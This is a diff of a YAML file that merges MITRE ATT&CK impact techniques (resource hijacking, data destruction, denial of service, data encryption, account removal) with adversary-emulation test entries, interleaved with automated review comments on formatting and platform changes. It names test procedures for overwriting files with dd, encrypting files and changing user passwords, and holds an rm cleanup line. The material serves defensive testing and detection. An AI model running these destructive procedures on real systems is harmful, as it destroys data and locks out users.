+ url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+ - source_name: Permiso SES Abuse 2023
+ description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+ 25, 2024.
+ url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.001:
+ technique:
+ modified: '2024-10-13T16:58:38.820Z'
+ name: Compute Hijacking
+ description: "Adversaries may leverage the compute resources of co-opted systems
+ to complete resource-intensive tasks, which may impact system and/or hosted
+ service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ is to validate transactions of cryptocurrency networks and earn virtual currency.
+ Adversaries may consume enough system resources to negatively impact and/or
+ cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+ Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+ because of the high potential for available resources, but user endpoint systems
+ may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+ and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+ environments may also be targeted due to the ease of deployment via exposed
+ APIs and the potential for scaling mining activities by deploying or compromising
+ multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+ Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+ cryptocurrency mining malware identify then kill off processes for competing
+ malware to ensure it’s not competing for resources.(Citation: Trend Micro
+ War of Crypto Miners)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Network Traffic: Network Connection Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Sensor Health: Host Status'
+ - 'Process: Process Creation'
+ - 'File: File Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+ created: '2024-09-25T13:34:30.100Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/001
+ external_id: T1496.001
+ - source_name: Unit 42 Hildegard Malware
+ description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+ Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+ url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+ - source_name: CloudSploit - Unused AWS Regions
+ description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+ Retrieved October 8, 2019.
+ url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+ - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+ description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+ 17, 2019.
+ url: https://securelist.com/lazarus-under-the-hood/77908/
+ - source_name: Trend Micro Exposed Docker APIs
+ description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+ via Exposed APIs. Retrieved April 6, 2021.
+ url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+ - source_name: Trend Micro War of Crypto Miners
+ description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+ Miners: A Battle for Resources. Retrieved April 6, 2021.'
+ url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1565:
technique:
modified: '2024-02-02T17:18:39.004Z'
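Review bot: in T1496.004 the `Sysdig LLMJacking 2024` reference is formatted title first, then date, then author ('LLMjacking: Stolen Cloud Credentials Used in New AI Attack. (2024, May 6). Alessandro Brucato.'), unlike every other entry in this patch, which puts the author first; it is upstream citation text, so fix it there rather than here, but note it so the next sync does not reintroduce it. Both new objects (T1496.004, T1496.001) arrive with `x_mitre_detection: ''` and `atomic_tests: []`, consistent with T1496.002.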
@@ -69450,11 +70429,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -69477,6 +70455,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -69494,9 +70473,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -69522,9 +70502,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests:
- name: Change User Password via passwd
@@ -69632,7 +70611,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
@@ -69656,7 +70635,6 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests:
- name: Encrypt files using gpg (FreeBSD/Linux)
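Review bot: T1486 keeps `x_mitre_attack_spec_version: 2.1.0` in the unchanged context even though `spec_version: '2.1'` is removed here, while the other objects in this patch are bumped to 3.2.0. Together with this object's earlier `modified` timestamp, that suggests T1486 was not regenerated from the same upstream release as the rest of the file.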
@@ -69834,7 +70812,7 @@ impact:
rm #{encrypted_file_path}
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -69853,7 +70831,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -69870,18 +70847,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
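Review bot: the T1499 platform list loses Azure AD, Office 365, SaaS and Google Workspace here and keeps only Windows, IaaS, Linux, macOS and Containers; if any per-platform index is generated from `x_mitre_platforms`, it must be regenerated in the same change so it stops listing this technique under the dropped platforms. Also, `x_mitre_modified_by_ref` is deleted in this hunk only to be re-added lower in the same object, which is key reordering rather than a content change; a fixed key order in the generator would keep future diffs limited to real changes.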
@@ -69905,8 +70877,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -69926,33 +70898,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -69963,7 +70924,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -69980,8 +70941,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -70000,39 +70964,14 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests:
- name: FreeBSD/macOS/Linux - Simulate CPU Load with Yes
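Review bot: the new 'Sysdig Cryptojacking Proxyjacking 2023' reference description contains a stray space before the period ('Targeting GitLab .'); if the text is copied verbatim from the upstream bundle this is an upstream issue, but please confirm the generator is not inserting it. Removing the seven old references is consistent with the rewritten T1496 description, which now cites only this one source.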
@@ -70050,62 +70989,61 @@ impact:
name: sh
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
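Review bot: nearly every line of this hunk is key reordering of the T1565.002 object; the only substantive changes are the `modified` timestamp, the FireEye APT38 URL moving from content.fireeye.com to mandiant.com, `x_mitre_attack_spec_version` going to 3.2.0, and the removal of `spec_version`. Please list those in the PR description, and consider emitting keys in a stable order so that updates like this show only what actually changed.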
@@ -70114,7 +71052,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -70140,9 +71078,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -70198,7 +71137,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests:
- name: FreeBSD/macOS/Linux - Overwrite file with DD
@@ -70226,50 +71164,7 @@ impact:
name: sh
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -70284,6 +71179,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -70296,16 +71195,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
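Review bot: the T1498 platform change is split across two hunks (the old list removed at the top of the object, the new list added here), so the net effect, that Azure AD, Office 365, SaaS and Google Workspace are dropped and only Windows, IaaS, Linux, macOS and Containers remain, is easy to miss. As with T1499, any per-platform index derived from this field needs regenerating in the same change; the `x_mitre_version` bump to '1.2' and the updated FS-ISAC URL and retrieval date are the only other content changes in the reorder.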
@@ -70373,11 +71308,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -70395,7 +71329,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
